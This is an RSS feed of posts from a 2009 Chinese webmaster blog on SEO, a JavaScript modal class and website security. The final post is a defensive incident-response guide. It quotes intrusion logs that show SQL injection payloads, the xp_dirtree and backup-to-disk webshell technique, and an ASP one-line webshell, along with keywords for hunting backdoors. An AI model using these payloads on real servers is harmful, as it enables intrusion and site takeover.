<p>位置在head标签以内。而在以往，对于同一站点内的复制内容，我都是通过301跳转以及robots协议进行限制。增加了这一手段目前看不到什么太大的应用前景&hellip;&hellip;个人认为继续使用301跳转以及robots协议就够了，因为使用301跳转可以为目标页面增加一个链接，并且，最要命的是，百度再一次不负众望地不参与这个协议。。比较令人失望。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-02-16 16:45:54]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[一个模拟模态窗口的JS类]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/jsmotaichuangkou21.html]]></link><description><![CDATA[<blockquote>
<p>function modal(d,h)//定义类本身<br />
{<br />
if(h!=&quot;hidden&quot;) document.write (&lsquo;&lt;div id=&quot;modalgraylay&quot; style=&quot;position:absolute; z-index:1; width:100%; height:&lsquo;+(document.body.scrollHeight+200)+&lsquo;px; top:0px; left:0px;BACKGROUND-COLOR:#efefef; FILTER: alpha(opacity=75); display:table;visibility:hidden;&quot;&gt;&lt;/div&gt;&lsquo;) ;<br />
this.div=d;<br />
this.hid=h;<br />
}<br />
//显示层<br />
//将需要中央显示的层居中，并显示它和背景层<br />
modal.prototype.show=function(h) {<br />
var d;<br />
d=this.div;<br />
Center(this.div);//<br />
window.onscroll=function(){Center(d)} <span style="color: #ff0000"><sup>备注1</sup></span><br />
window.onresize=function(){Center(d)}<br />
if(this.hid!=&quot;hidden&quot;) show(&quot;modalgraylay&quot;);<br />
show(this.div);<br />
} <br />
//隐藏层<br />
//隐藏中央显示的层和背景层<br />
modal.prototype.closeit=function() {<br />
if(this.hid!=&quot;hidden&quot;) hid(&quot;modalgraylay&quot;);<br />
hid(this.div);<br />
}<br />
function Center(d){<br />
var h,tab,w;<br />
tab=document.getElementById(d);<br />
//alert(d);<br />
if(IsIe()==7) h=Math.floor((document.documentElement.clientHeight-tab.clientHeight)*4/8)+document.documentElement.scrollTop;<br />
else{h=Math.floor(((IsIe()&gt;0?document.documentElement.clientHeight:window.innerHeight)-tab.clientHeight)*4/8)+document.documentElement.scrollTop;}<br />
tab.style.top=h+&quot;px&quot;;<br />
if(IsIe()==7) w=Math.floor((document.documentElement.clientWidth-tab.clientWidth)*4/8);<br />
else w=Math.floor(((IsIe()&gt;0?document.body.offsetWidth:window.innerWidth)-tab.clientWidth)*4/8);<br />
tab.style.left=w+&quot;px&quot;;<br />
}<br />
function IsIe(){<br />
var ua=window.navigator.userAgent;<br />
var msie=ua.indexOf(&quot;MSIE &quot;);<br />
if(msie&gt;0) msie=parseInt(ua.substring(msie+5,ua.indexOf(&quot;.&quot;,msie)));<br />
return msie;<br />
}<br />
function $(o){return document.getElementById(o);}<br />
function show(o){$(o).style.display=&quot;block&quot;;$(o).style.visibility=&quot;visible&quot;;}<br />
function hid(o){$(o).style.display=&quot;none&quot;;$(o).style.visibility=&quot;hidden&quot;;}</p>
<p>&nbsp;</p>
</blockquote>
<p>调用方式</p>
<blockquote>
<p>var a=new modal(&quot;upimage&quot;);//构造隐藏的层<br />
var b=new modal(&quot;upsuccess&quot;);//构造隐藏的层<br />
//显示背景层以及中间的divbox1<br />
function showmodal(){a.show()}<br />
function closemodal(){a.closeit()}<br />
function showmodal1(){b.show()}<br />
function closemodal1(){b.closeit()}</p>
</blockquote>
<p>当中出现了几个问题</p>
<p>1、备注1原有的代码是window.onscroll=function(){Center(this.div)}，但是实际上，当执行window.onscroll时候，无法取得this.div的值。后面将window.onscroll=function(){Center(this.div)}改为window.onscroll=function(){Center(d)}，写入构造函数，但是又出现新问题，当创建第二个实例以后，第二个窗口无法根据浏览器窗口变化居中，最终改为现在的样子。</p>
<p>2、最初调用时出现第一次调用center位置靠右的情况，后来发现不能给居中的窗口设定display:none属性来隐藏</p>
<p>现在存在的问题：</p>
<p>1、如果将居中窗口放在页面最底部，会出现一段空白</p>
<p>2、隐藏层没有完全遮挡住页面</p>
<p>应该都是小问题，有空时候再雕琢下</p>
<p>码代码时候 技术交流qq群<a href="http://qun.qq.com/1.1/search?tx=17322384">17322384</a>的大闸蟹 (87338772)和 AI为吃饭拼命 (39126263) 帮了不少忙，鸣谢~~</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-02-08 10:14:37]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[微软将推出群体搜索挑战google]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/weiruangoogle20.html]]></link><description><![CDATA[<blockquote>
<p>杰亚米&middot;蒂凡和他的同事梅雷迪思&middot;莫里斯（MeredithMorris）以及史蒂夫&middot;布什（SteveBush）在对如何优化网络搜索的多年研究中发现，现实社会中的&ldquo;物以类聚，人以群分&rdquo;的法则，在网络社会其实表现得更加突出。&ldquo;在网络世界中，有着相同&quot;兴趣&quot;和&quot;情趣&quot;的人，在使用搜索时，使用的关键词和表达方式往往具有惊人的相似度，而微软的新技术，判断出这些人的志趣点，为他们找到符合他们思维和表达方式的搜索结果。&rdquo;为了解释清楚&ldquo;群体搜索&rdquo;的概念，杰亚米&middot;蒂凡举了一个例子。比如，人们在网络上谈论远程办公时，一些倾向于SOHO的人会联想到在家里办公的好处，而还有一些人则想到了把远程办公和在办公室上班作一个充分的比较。&ldquo;很明显，这两种人的思维方式和习惯有着明显的不同，&rdquo;杰亚米&middot;蒂凡指出，用传统的搜索引擎提供的服务，这两种人在搜索同一主题时，很可能得到相同搜索的结果，&ldquo;<span style="color: #ff0000">微软要做的就是先通过交互手段搞清楚他们的倾向和原则，把这些人划分成若干的群体</span>，然后为他们提供最精准与&quot;善解人意&quot;的搜索结果。&rdquo;</p>
</blockquote>
<p>在&ldquo;<a href="http://www.001pp.com/sousuoyinqingyouhua/sousuoyinqingxinjishu11.html">挤压seo&mdash;危及seo市场的几种搜索引擎新技术</a>&rdquo;一文中，我提到个性化的搜索服务可能会成为今后搜索引擎发展的一个重要方向，从这则新闻上看，微软似乎已经开始打算应用这项技术了，令人惊叹地是，微软采用了一个&ldquo;投机取巧&rdquo;的个性化方式&mdash;&mdash;将用户进行分组&mdash;&mdash;之前我所认为的个性化搜索应该是一件很个人的事情，最极端的情况是，任何不同的2个用户搜索结果都将是不同的，因而这种搜索引擎的实现将非常复杂，涉及到了大量的数据挖掘，而微软的做法现在在目前更切合实际，利用几个维度，将用户简单分成不同特征的若干群组，呈现不同的搜索结果，事实上百度已经尝试了这种&ldquo;群体搜索&rdquo;，部分关键词按照地区划分人群给出当地的搜索结果，微软可能走得更远，除了按照地区区别用户特征以外，还可以根据购买力（根据用户搜索奢侈品和高档消费品的记录），年龄层次（关注&ldquo;非主流&rdquo;和&ldquo;房贷&rdquo;的用户年龄层次很容易区分），甚至于性别（根据统计规律可以区分出不同性别的用户的搜索习惯）等等。相信加入这些维度之后，足以使用户的搜索体验极大的提高，期待这个搜索引擎的推出！</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-02-04 17:10:17]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[弱密码排行，你上榜了么]]></title><link><![CDATA[http://www.001pp.com/wangzhananquan/ruomimapaixing19.html]]></link><description><![CDATA[<p>根据对36731个真实密码的统计，发现</p>
<p>有8.9%的用户使用了前十个高频率的密码</p>
<p>10.7%的用户使用了前50个高频率的弱密码</p>
<p>18.9%的用户使用了1000个常见的弱密码</p>
<p>这个比例十分惊人</p>
<p>鉴于这份榜单可能带来危害较大，不予公布。</p>
<p style="text-align: center">&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-26 17:03:30]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/wangzhananquan/"><![CDATA[网站安全]]></category><source url="http://www.001pp.com/asp/rss.asp?id=133"><![CDATA[网站安全]]></source></item><item><title><![CDATA[不容忽视的后台安全问题]]></title><link><![CDATA[http://www.001pp.com/wangzhananquan/houtaianquan18.html]]></link><description><![CDATA[<p>前台的安全性问题网上著述颇多，但是对于网站的安全问题，任何一个环节的疏忽都可能导致灾难性的后果，因此容易后台的安全问题也不容忽视</p>
<p>1、后台用户名和密码是否是明文保存的？</p>
<p>建议增加昵称字段，区别后台的用户，同时对用户名和密码进行非规范的md5加密，例如加密以后截取15位字串。</p>
<p>2、管理成员是否有权限的划分</p>
<p>一旦没有划分权限，一个编辑用户的帐户失窃也可能为你带来灾难性的后果</p>
<p>3、是否有管理日志功能</p>
<p>管理日志必须在近几日无法被删除，这是分析入侵者入侵手法的重要依据。</p>
<p>4、后台入口是否隐秘</p>
<p>不要愚蠢地将入口暴露在前台页面中，也不要使用容易被猜测到的后台入口地址。</p>
<p>5、后台页面是否使用了meta robots协议限制搜索引擎抓取</p>
<p>google工具条，百度工具条，或者不经意间出现的后台链接都可能导致你的后台页面被搜索引擎发现，这时候在meta中写入禁止抓取的语句是个明智的选择，但是，切莫将后台地址写入robots.txt，参照第四点。</p>
<p>6、管理页面是否做了防注入</p>
<p>粗心的程序员往往只考虑了前台页面的诸如。</p>
<p>7、access是否有自定义数据库备份功能</p>
<p>这是asp+access系统中最臭名昭著的功能，自定义数据库备份可以让入侵者轻松获得webshell</p>
<p>8、是否有自定义sql语句执行功能</p>
<p>同第7点。</p>
<p>9、是否开启了在线修改模板功能</p>
<p>如果没有必要，建议不要开启，防止对方轻易插入跨站脚本。</p>
<p>10、是否直接显示用户提交的数据</p>
<p>任何时候，用户的输入都是不可信的，设想如果对方输入了一段恶意js，而你在后台没有任何防护的情况下就打开？</p>
<p>11、编辑器的漏洞是否清除，是否已经去除了无意义的功能。</p>
<p>最有名的例子就是ewebeditor的数据库漏洞,默认用户名密码漏洞等</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-25 13:28:51]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/wangzhananquan/"><![CDATA[网站安全]]></category><source url="http://www.001pp.com/asp/rss.asp?id=133"><![CDATA[网站安全]]></source></item><item><title><![CDATA[揭秘搜索引擎收录问题]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/sousuoyinqingshoulu17.html]]></link><description><![CDATA[<p>google04年推出sandbox后，百度终于也在去年提高了新站收录的标准，seo的门槛变得比以前更高了，很多时候新站的收录都成了一个问题，为什么搜索引擎不收录我的网站呢？为什么我的网站收录比其他人慢？根据常见程度排序，搜索引擎收录问题归纳起来有以下几方面的原因，大家可以对照着看自己的网站属于哪一种：</p>
<p>1、 内容违法</p>
<p>这种行为一般较罕见，违反国家法律以及法规的网页，一般搜索引擎是不会收录的，百度在&quot;站长FAQ&quot;（http://www.baidu.com/search/guide.html#1）中明确指出不收录&quot;不符合国家法律和法规规定&quot;的网页， 谷歌在这方面还是在努力中，但是随着google中国化进程的深入，对于违法内容的打击势必越来越严厉，如果大家有兴趣可以对照搜索几个色情论坛&hellip;&hellip;这个具体我就不举例子了。</p>
<p>2、 robots协议有误</p>
<p>由于robots协议的复杂性，导致有小部分站长在创建robots协议的出现错误误导了spider，常见的错误有以下几种：<br />
（1）、 颠倒了顺序<br />
错误写成：<br />
User-agent: *<br />
Disallow: GoogleBot <br />
正确的应该是：<br />
User-agent: GoogleBot<br />
Disallow: *<br />
（2）、把多个禁止命令放在一行中<br />
例如错误写成：<br />
Disallow: /css/ /cgi-bin/ /images/<br />
正确的应该是：<br />
Disallow: /css/<br />
Disallow: /cgi-bin/<br />
Disallow: /images/<br />
（3）、行前有大量空格<br />
例如写成：<br />
Disallow: /cgi-bin/<br />
尽管在标准没有谈到这个，但是这种方式很容易出问题。<br />
（4）、404重定向到另外一个页面<br />
当Robot访问很多没有设置robots.txt文件的站点时，会被自动404重定向到另外一个Html页面。这时Robot常常会以处理robots.txt文件的方式处理这个Html页面文件。虽然一般这样没有什么问题，但是最好能放一个空白的robots.txt文件在站点根目录下。<br />
（5）、采用大写。例如<br />
USER-AGENT: EXCITE<br />
DISALLOW:<br />
虽然标准是没有大小写的，但是目录和文件名应该小写：<br />
user-agent:GoogleBot<br />
disallow:<br />
（6）、语法中只有Disallow，没有Allow<br />
错误的写法是：<br />
User-agent: Baiduspider<br />
Disallow: /john/<br />
allow: /jane/<br />
（7）、忘记了斜杠/<br />
错误写作：<br />
User-agent: Baiduspider<br />
Disallow: css<br />
正确的应该是：<br />
User-agent: Baiduspider<br />
Disallow: /css/<br />
&hellip;&hellip;</p>
<p>对于robots协议，飞翔猪建议大家创建robots协议之前仔细阅读一些robots协议的教程，例如百度的帮助文件&quot;禁止搜索引擎收录的方法(<a href="http://www.baidu.com/search/robots.html">http://www.baidu.com/search/robots.html</a>)&quot; 就十分详细，google的网站管理员工具中，也有&quot;分析 robots.txt&quot;，&quot;生成 robots.txt&quot;两个工具，大家可以充分利用起来。</p>
<p>3、 网站设计问题</p>
<p>这种情况在前几年的企业站中比较常见，最常见的情况是，整站flash，整站js，蜘蛛无法抓取，对于这样的网站，改版是最好的选择，相关讨论很多，这边就不赘述了</p>
<p>4、 网站不稳定</p>
<p>网站不稳定影响收录的情况是相对比较多见，他对spider的抓取有2种影响，一种是，刚好spider抓取页面的时候你的网站无法访问，spider认为你的网站没有内容，相当长的一段时间不会继续访问，造成收录延迟，或者是spider抓取的过程中遇到了太多的错误，某一页面时而可以被抓取时而不可以被抓取，让搜索引擎认为你无法为访问者提供有用的内容&mdash;&mdash;毕竟如果用户从搜索结果点击进去以后出现一个404页面是让搜索引擎很难接受的&mdash;&mdash;网站不稳定的原因也包括2种情况，一种是服务器不稳定，很多站长贪图便宜，使用一些比较便宜的主机，往往每台机子上放置了数百个网站，建议站长最好选择一些比较知名的idc购买主机，譬如新网互联，时代互联，西部数码。还有一种情况，网站的程序不稳定，例如 http://www.law158.com/长期无法被收录，从iis访问日志中，发现蜘蛛抓取的页面出现了多次无法访问的情况，原来该站上线之初，由于程序员在编写程序时，不注意程序的执行效率的优化，导致一部分动态页面占用了过多的资源，访问用户一多马上出现Service Unavailable 提示。对于这种情况，思路就是排查占用过多资源的页面，一般而言，程序的执行时间越长，占用的资源也就越多，越容易出现Service Unavailable错误，一般的动态页面执行时间不应该超过325ms，因此我建议该站管理员在动态页面加入一段查看程序执行时间的代码，代码如下<br />
程序顶部：starttime=timer<br />
程序尾部：response.Write （timer- starttime）&amp;&quot;ms&quot;<br />
经过排查了几个执行时间超过350ms的问题页面以后，网站访问情况趋于稳定，一个更新周期以后网站就被收录了。</p>
<p>5、 关联惩罚</p>
<p>所谓城门失火，殃及池鱼，如果某个网站被搜索引擎封杀，同时你的网站又不幸地被搜索引擎判定，2者之间有密切的关系，那么很遗憾，收录就是不可能的事情了，特别是百度，对于一些站群，垃圾站，seo过度站点的封杀极为严厉。关联惩罚分为三种，域名关联，服务器关联，链接关联。</p>
<p>（1）、域名关联。Google在早期的一项专利说明文档中有提到，whois信息可以被搜索引擎检索到并利用于结果排序中。因此，搜索引擎可以通过whois信息判断某个网站的归属，譬如你制作了一个垃圾站http://www.a.com/被搜索引擎封杀，而后，又以相同的whois申请了一个http://www.b.com、 的域名做另外一个网站，那么http://www.b.com/可能不会被收录，因为搜索引擎根据whois资料里的信息判断2个网站的所有者是相同的，当然，这边只是举例而已，一般而言，因为1个站被惩罚而触发域名关联的几率是比较小的。对于这种情况，建议各位站长在申请域名的时候，不要每个域名的whois信息都一样。</p>
<p>（2）、服务器/ip关联。如果你和被搜索引擎惩罚过的网站处于同一台服务器，或者共用一个ip，那么搜索引擎可能不会收录你的内容。不过在国内，由于多数使用的是虚拟主机，因此几百个站共用一个ip或者一台服务器也是常见的，这种情况无需担忧，但是如果是与朋友合租，一台服务器只放了几个站点，其中有个站点是被惩罚过的，那么就要小心了，应当考虑更换服务器。例如不久前朋友让我看的一个站，长期以来一直没有被收录，排除了其他因素以后，通过http://www.114best.com/ip/的同ip反查功能发现，该站和1个被k的qq空间站，还有一个几个月没被收录的私服站为邻，这才知道未被收录的原因。更换了服务器以后，本次更新周期就被收录了。</p>
<p>（3）、链接关联。Goolge 的&quot;网站管理员指南&quot;（http://www.google.com/support/webmasters/bin/answer.py?answer=35769#design）中提到，&quot;请不要参与旨在提高您的网站排名或 PageRank 的链接方案。 尤其要避免链接到违禁的网站或&quot;恶邻&quot;&quot;，明确指出链接向有问题的网站，可能导致排名或者收录问题。这就要求站长在选择友情链接的时候擦亮眼睛，除了看pr以外，还应该查看网站在百度等其他搜索引擎的收录情况，网站本身的内容质量，避免与&quot;恶邻&quot;为伍。</p>
<p>6、内容质量不高</p>
<p>百度在&quot;站长FAQ&quot;中指出，百度不收录&quot;复制自互联网上的高度重复性的内容。&quot; Goolge 的&quot;网站管理员指南&quot;也用了专门一节谈论&quot;原创内容很少或非原创内容&quot; http://www.google.com/support/webmasters/bin/answer.py?answer=66361，如果你的网站内容是互联网上转载过很多遍的，或者根本没有内容，那么spider可能会一去不复返，例如http://www.zhaoche51.com/此站建立于今年7月初，baiduspider从7月14日光顾一次抓取了300多个页面以后就没有再光顾过，后来我仔细查看了该站的iis日志，发现了baiduspider光顾的日志如下：<br />
&hellip;&hellip;<br />
[18822] 2008-07-14 08:48:32 W3SVC746795306 222.74.81.18 www.zhaoche51.com GET /station.asp c=毕节 80 - 61.135.168.160 Baiduspider+(+http://www.baidu.com/search/spider.htm) 200 0 0<br />
[18823] 2008-07-14 08:48:32 W3SVC746795306 222.74.81.18 www.zhaoche51.com GET /station.asp c=延安 80 - 61.135.168.160 Baiduspider+(+http://www.baidu.com/search/spider.htm) 200 0 0<br />
[18837] 2008-07-14 08:48:36 W3SVC746795306 222.74.81.18 www.zhaoche51.com GET /station.asp c=鄂州 80 - 61.135.168.160 Baiduspider+(+http://www.baidu.com/search/spider.htm) 200 0 0<br />
[18839] 2008-07-14 08:48:38 W3SVC746795306 222.74.81.18 www.zhaoche51.com GET /bus.asp id=136 80 - 61.135.168.160 Baiduspider+(+http://www.baidu.com/search/spider.htm) 200 0 0<br />
[18840] 2008-07-14 08:48:38 W3SVC746795306 222.74.81.18 www.zhaoche51.com GET /station.asp c=阳江 80 - 61.135.168.160 Baiduspider+(+http://www.baidu.com/search/spider.htm) 200 0 0<br />
&hellip;&hellip;<br />
非常遗憾的是，baiduspider所抓取的页面都只是程序自动生成的一个框架页（如/station.asp?c=阳江），并没有实质的内容！这就导致了百度认为这个网站目前根本没有价值，长达22天未再访问此站。对此，我建议大家，网站还未做好，内容还未填充的框架，尽量不要给提交给百度或者与朋友交换友情链接，这样将导致搜索引擎认为你网站当前不具备收录价格，而无法在当次收录周期中被收录。</p>
<p>7、spider入口不足。</p>
<p>有部分网站能够很快被搜索引擎收录，而有部分网站在内容完全的情况下，却要一两个月才会被搜索引擎收录，这里面，牵引蜘蛛去抓取网站是一个很重要的方面，一个新站建成以后，比如告知搜索引擎该站的网址，以往都是采用向搜索引擎提交网址的方式告知，如百度的提交入口<a href="http://www.baidu.com/search/url_submit.html">http://www.baidu.com/search/url_submit.html</a>，google的网站提交入口http://www.google.com/addurl/?hl=zh-CN&amp;continue=/addurl，但是传说，手工提交网址容易遭到人工审核，遭遇不必要的麻烦，因此现在更多的是不提交，在一些网站上做个链接，让spider自然地循着链接抓取到新网站的内容，这里有一个常见的错误是，很多人以为随便做个链接就可以，结果是蜘蛛在你链接做好以后1，2个月才姗姗来迟，收录那更是遥远的事情了，指向新站的链接来源，应该是spider访问频繁，而且最好内容和你的网站相关的，spider访问频繁，你的链接才会更快地被spider所识别，内容和新站相关，链接才会被spider认为比较有抓取价值。<br />
&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-23 14:25:00]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[网站被黑怎么办]]></title><link><![CDATA[http://www.001pp.com/wangzhananquan/wangzhanbeiheizenmeban16.html]]></link><description><![CDATA[<p>很多朋友都遇到过网站被黑，插入恶意代码的经历。可能大家以为只要把这些代码删除了既可，但是，道高一尺，魔高一丈，如果只是简单删除代码以后，绝大部分的朋友会再次遇到&hellip;&hellip;事实上，要很好地应对网站入侵，老猪总结了几个步骤如下，并根据以下几个步骤写了份案例附后，希望对大家有所帮助：</p>
<p>一、下载服务器日志，ftp传输日志。</p>
<p>当发现网站被黑以后，首先要做的就是下载日志文件，包括服务器日志和ftp传输日志，服务器的日志位置一般是位于C:\WINDOWS\system32\Logfiles\W3SVC1。ftp日志则取决于你的服务器所安装的ftp软件，比如SERVE-U默认是在安装目录下。但是，这边提醒一点，既然你今天看到这篇文章，服务器的各种日志，一定要转移出默认的地方，同时设置一下删除保护。对于虚拟主机用户。一般你的空间提供商都会提供3天之内的日志以及1个月的ftp日志下载，具体可以咨询你的空间提供商。下载日志这点很重要。它是我们接下去找出漏洞的关键。</p>
<p>二、替换所有恶意代码</p>
<p>进行下载日志的同时，应该开始删除恶意代码，以免影响用户体验。如果你拥有服务器，推荐你使用老马写的findstr，把恶意插入的代码批量替换掉。如果你使用虚拟主机，有部分虚拟主机提供批量替换功能。如果你的虚拟主机没有提供这样的功能（破烂货，赶快换掉），那你可以去下载一个雷客图ASP站长安全助手。来进行此项操作。这项操作要谨慎点，因为是对内容直接进行替换，稍微一马虎可能让你的网页内容面目全非。</p>
<p>三、下载到本地杀毒，或者服务端杀毒</p>
<p>接下来，我们要开始找出入侵的幕后黑后了。记住，发现病毒先不要忙着删除。如果你拥有个人服务器，可以开启杀毒软看看，如果是使用虚拟主机可以下载到本地，用杀毒软件杀，或者用我刚才说的那个ASP站长安全助手。发现病毒以后，刚才说的，不要忙着杀掉。查看那个病毒文件的修改时间。这个步骤是最关键的。一般对方不会只留一个后门，可能会有漏网之鱼。这时你可以搜索刚找到的那个病毒文件的修改时间，检查这段时间建立或者修改了什么文件。那些文件都是嫌疑犯，统统记住他们的文件名，注意，这边没有让你删除，要先记住文件名！</p>
<p>这边要提到一种情况，对方的木马很隐秘，找不到，这个时候，你需要在所有的网页文件中，查找一些木马常用的词，比如asp木马，一般会有这些字符出现在木马中，比如&ldquo;木马&rdquo;，&ldquo;免杀&rdquo;，&ldquo;w&rdquo;，&ldquo;shell&rdquo;等等字符，有出现这些字符的，可能为对方留下的后门</p>
<p>四、同时，查找日志中的敏感词，如&ldquo;select&rdquo;，&ldquo;and%201=1&rdquo;，获得对方ip</p>
<p>获得对方的木马的文件名以后，这个时候要用到我们刚才的日志了来找到对方ip，看对方进行了什么操作。以某次反入侵经历例，通过查找特征字符，发现对方使用swz.asp这个木马文件作为后门。于是在日志中搜索swz.asp，发现对方入侵的ip，当然，如果你在上一个步骤没有找到木马，也可以通过查找&ldquo;&ldquo;select&rdquo;，&ldquo;and%201=1&rdquo;，这样一些入侵的蛛丝马迹，获得对方ip为220.162.26.96</p>
<p><br />
五、在日志中查找该ip，了解对方入侵的过程。</p>
<p><br />
在这些日志中查找&ldquo;220.162.26.96&rdquo;这个字符串。发现以下一些记录：//后面为记录</p>
<p>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p>
<p>[41425] 2007-07-12 03:52:40 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&amp;id=1626 and exists (select * from sysobjects) -- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64</p>
<p>//123.asp出现漏洞，对方使用注入语句在获得权限</p>
<p>[41492] 2007-07-12 03:52:56 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&amp;id=1626;DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree &quot;D:\&quot;, 1,1-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64</p>
<p>[41494] 2007-07-12 03:52:56 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&amp;id=1626 And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_Tmp)=0 --|57|80040e07|将_varchar_值_‘|13|‘_转换为数据类型为_int_的列时发生语法错误。 80 - 220.162.26.96 Internet+Explorer+6.0 500 0 0</p>
<p>[47001] 2007-07-12 04:23:06 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&amp;id=1626;DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree &quot;e:\wwwroot\&quot;, 1,1-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64</p>
<p>//利用了master..xp_dirtree</p>
<p>[47635] 2007-07-12 04:24:47 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&amp;id=1626;alter database mytable set RECOVERY FULL-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+KuGooSoft) 200 0 0</p>
<p>[47699] 2007-07-12 04:25:12 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&amp;id=1626;create table ahcmd (a image)-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+KuGooSoft) 200 0 0</p>
<p>[47754] 2007-07-12 04:25:25 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&amp;id=1626;backup log mytable to disk = ‘c:\ahcmd‘ with init-- 80 - 220.162.26.96</p>
<p>[47758] 2007-07-12 04:25:31 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&amp;id=1626;insert into ahcmd (a) s (‘&lt;%execute request(&quot;&quot;)%&gt;‘)-- 80 - 220.162.26.96</p>
<p>//插入一句话木马</p>
<p>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p>
<p>答案揭晓了，这是由于老猪之前的程序员所编写的页面123.asp传入参数过滤不严格，导致了对方在服务器上为所欲为，同时，从日志上也可以看到，master..xp_dirtree这个存储过程也起到了助纣为虐的作用。</p>
<p>七、弥补对方入侵漏洞。</p>
<p>接着，根据日志的提示，修改123.asp页面，字符串参数过滤单引号，数字参数格式化为数字类型。在查询分析器使用sp_dropextendedproc ‘xp_dirtree‘删除掉它，同时删除掉其他的一些危险的存储过程。</p>
<p>八、修改ftp密码，超级管理员密码，3389登陆端口，用户名，密码。</p>
<p>接着就是善后了。对方如果已经入侵了你的站点，这些密码都不再是密码，因此最保险的做法就是全部改掉。</p>
<p>九、将对方的ip，入侵时间，日志提交给当地网警。Ping对方使用的僵尸网站，查询对方网站所用ip，打电话到对方网站所在地的通信管理局投诉。</p>
<p>毛主席教导我们，&ldquo;宜将剩勇追穷寇，不可沽名学霸王&rdquo;，本着除恶务尽的原则，一定要报案，这需要你保存对方入侵的日志，还有ip提供给警方。同时，如果对方插入了恶意代码里面包含网址，<font color="#000000">例如</font>www.abc.com那恭喜你，整他的法子更多了，可以向信息产业部报案，可以ping这个站点，比如ping www.abc.com返回的ip为 222.222.222.222是位于广东揭阳的，那你还可以打电话到广东揭阳的通信管理局投诉。这个时候，就是你尽情发泄的时候了。<br />
